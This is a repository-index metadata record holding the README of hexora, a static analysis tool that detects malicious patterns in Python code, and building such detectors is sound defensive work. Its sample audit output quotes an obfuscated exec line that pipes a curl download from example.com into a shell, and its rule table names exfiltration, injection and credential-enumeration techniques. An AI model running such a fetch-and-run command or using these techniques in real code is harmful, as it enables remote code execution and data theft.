{"id":30896887,"url":"https://github.com/rushter/hexora","last_synced_at":"2025-12-27T14:44:58.210Z","repository":{"id":310738793,"uuid":"1030990993","full_name":"rushter/hexora","owner":"rushter","description":"Static analysis of malicious Python code","archived":false,"fork":false,"pushed_at":"2025-09-05T17:19:12.000Z","size":171,"stargazers_count":21,"open_issues_count":0,"forks_count":2,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-09-05T18:42:20.282Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rushter.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-08-02T19:10:44.000Z","updated_at":"2025-09-05T17:19:16.000Z","dependencies_parsed_at":"2025-08-20T00:26:50.718Z","dependency_job_id":"68b83e3d-cea5-4a4e-9812-49f0a8ea3326","html_url":"https://github.com/rushter/hexora","commit_stats":null,"previous_names":["rushter/hexora"],"tags_count":2,"template":false,"template_full_name":null,"purl":"pkg:github/rushter/hexora","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rushter%2Fhexora","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rushter%2Fhexora/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rushter%2Fhexora/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rushter%2Fhexora/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rushter","download_url":"https://codeload.github.com/rushter/hexora/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rushter%2Fhexora/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":274231140,"owners_count":25245675,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-08T02:00:09.813Z","response_time":121,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-09-08T23:47:21.550Z","updated_at":"2025-12-27T14:44:58.204Z","avatar_url":"https://github.com/rushter.png","language":"Rust","readme":"# hexora\n\n[![PyPI - Version](https://img.shields.io/pypi/v/hexora?logo=pypi\u0026label=Pypi\u0026logoColor=fff)](https://pypi.org/project/hexora)\n\n\nHexora is a static analysis tool designed to detect malicious and harmful patterns in Python code.\n\nIt can be used to:\n\n- Audit project dependencies to catch potential supply-chain attacks\n- Detect malicious scripts found on platforms like Pastebin, GitHub, or open directories\n- Analyze IoC files from past security incidents\n- Audit new packages uploaded to PyPi.\n\n\n\u003cimg width=\"600\" alt=\"Hexora example\" src=\"docs/example.gif\"\u003e\n\n\n# Examples\n\nFor output examples, please see [docs/examples.md](docs/examples.md) file.\n\n# Installation\n\n## Using Python\n\nRequires Python 3.9+.\n\n```bash\npip install hexora\n```\n\nUsing uv:\n```bash\nuv tool install hexora\n```\n\n# Usage\n\n\n```bash\nhexora --help\n```\n\n## Audit single file\n\n```bash\n\u003e hexora audit test.py\n\nwarning[HX2000]: Reading from the clipboard can be used to exfiltrate sensitive data.\n ┌─ resources/test/test.py:3:8\n │\n1 │ import pyperclip\n2 │\n3 │ data = pyperclip.paste()\n │ ^^^^^^^^^^^^^^^^^ HX2000\n │\n = Confidence: High\n Help: Clipboard access can be used to exfiltrate sensitive data such as passwords and keys.\n\nwarning[HX3000]: Possible execution of unwanted code\n ┌─ resources/test/test.py:20:1\n │\n19 │ (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)\n20 │ _ceil(\"import subprocess;subprocess.call(['curl -fsSL https://example.com/b.sh | sh'])\")\n │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3000\n │\n```\n\n\n## Audit directory\n\n```bash\nhexora audit --output-format terminal resources/test/\n```\n\n\n## Audit packages from virtual environment\n\n```bash\nhexora audit --exclude HX5020,HX5030,HX5040,HX5050,HX5060 --min-confidence high .venv/lib/python3.11/site-packages/\n```\n\nWhere `python3.11` is the version of the Python in virtual environment.\n\nTips:\n\n- Use `--exclude` to suppress certain rule codes (e.g., noisy imports) for a given run\n- Use `--min-confidence` to focus on high-confidence findings only.\n\nConfidence indicates how a certain piece of code is malicious.\nSome libraries or code snippets are used for legit purposes, and it's hard to distinguish legit use-cases from\nmalicious ones.\nThat's why some matches have a low confidence level.\n\nSome rules can have different confidence levels. Avoid filtering a lot of rules by codes unless you are\nvery confident. For example, code and shell execution can have medium, high, and very high confidence.\nThis depends on how the code was executed. If we detect an obfuscation attempt, we elevate confidence.\n\nFor example, this code will have a high confidence:\n```\nglobals()[\"__builtins__\"].eval(\"print(123)\")\n```\n\n## Usage in Python\n\n```python\n\u003e\u003e\u003e import hexora\n\u003e\u003e\u003e results = hexora.audit_path(\"/Projects/hexora/resources/test/\")\n\u003e\u003e\u003e len(results)\n15\n\u003e\u003e\u003e results[0]\n{'items': [{'confidence': 'low',\n 'description': 'pyperclip can be used to copy and paste data from '\n 'the clipboard.',\n 'label': 'pyperclip',\n 'location': (7, 16),\n 'rule': 'HX5010'},\n {'confidence': 'high',\n 'description': 'Reading from the clipboard can be used to '\n 'exfiltrate sensitive data.',\n 'label': 'pyperclip.paste',\n 'location': (25, 42),\n 'rule': 'HX2000'}],\n 'path': '/Projects/hexora/resources/test/clipboard_01.py'}\n\u003e\u003e\u003e # Single file audit\n\u003e\u003e\u003e result = hexora.audit_file(\"/Projects/hexora/resources/test/clipboard_01.py\")\n\u003e\u003e\u003e ...\n ```\n\n## Available rules\n\nNew rules are added regularly.\n\nRight now, the following rules are available:\n| Code | Name | Description |\n|---|---|---|\n| HX1000 | AppEnumeration | Suspicious application enumeration. |\n| HX1010 | BrowserEnumeration | Suspicious browser enumeration (apps, cookies, history, etc.). |\n| HX1020 | PathEnumeration | Suspicious path enumeration. |\n| HX1030 | OSFingerprint | Suspicious OS fingerprinting. |\n| HX2000 | ClipboardRead | Reading from the clipboard. |\n| HX2010 | EnvAccess | Access to a sensitive environment variable. |\n| HX3000 | CodeExec | Possible code execution. |\n| HX3010 | ShellExec | Execution of a shell command. |\n| HX3040 | DLLInjection | Possible DLL injection. |\n| HX3050 | DangerousExec | Execution of potentially dangerous command inside a shell command. |\n| HX3060 | SuspiciousCall | Suspicious function call. |\n| HX4000 | ObfuscatedShellExec | Execution of an obfuscated shell command. |\n| HX4010 | ObfuscatedCodeExec | Execution of obfuscated code. |\n| HX5000 | DunderImport | Suspicious use of `__import__`. |\n| HX5010 | SuspiciousImport | Suspicious import. |\n| HX5020 | CtypesImport | Suspicious ctypes import. |\n| HX5030 | PickleImport | Suspicious pickle import. |\n| HX5040 | StructImport | Suspicious struct import. |\n| HX5050 | SocketImport | Suspicious socket import. |\n| HX5060 | MarshalImport | Suspicious marshal import. |\n| HX6000 | Base64String | Long Base64-encoded string detected; possible code obfuscation. |\n| HX6010 | HexedLiterals | List of hex-encoded literals detected; possible payload. |\n| HX6020 | HexedString | Long hex-encoded string detected; possible payload. |\n| HX6030 | IntLiterals | Large list of integer literals detected; possible code obfuscation. |\n| HX6040 | CVEInLiteral | Literal contains a CVE identifier. |\n| HX6050 | SuspiciousLiteral | Suspicious literal detected; possible data enumeration. |\n| HX6060 | PathTraversal | Suspicious path traversal. |\n| HX6070 | BrowserExtension | Enumeration of sensitive browser extensions. |\n| HX6080 | WebHook | Suspicious webhook detected. Possible data exfiltration. |\n| HX7000 | SuspiciousFunctionName | Suspicious function name. |\n| HX7010 | SuspiciousParameterName | Suspicious parameter name. |\n| HX7020 | SuspiciousVariable | Suspicious variable name. |\n| HX9000 | DataExfiltration | Potential data exfiltration. |\n| HX8000 | BinaryDownload | Suspicious binary download. |\n| HX8010 | BuiltinsVariable | Suspicious builtin variable usage. |\n| HX8020 | SuspiciousComment | Suspicious comment. |\n| HX8030 | SuspiciousWrite | Suspicious write to the filesystem. |\n\n## Credits\n\nFor parsing, we use AST parser from [ruff](https://github.com/astral-sh/ruff/tree/main) library.\n","funding_links":[],"categories":["Utilities"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frushter%2Fhexora","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frushter%2Fhexora","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frushter%2Fhexora/lists"}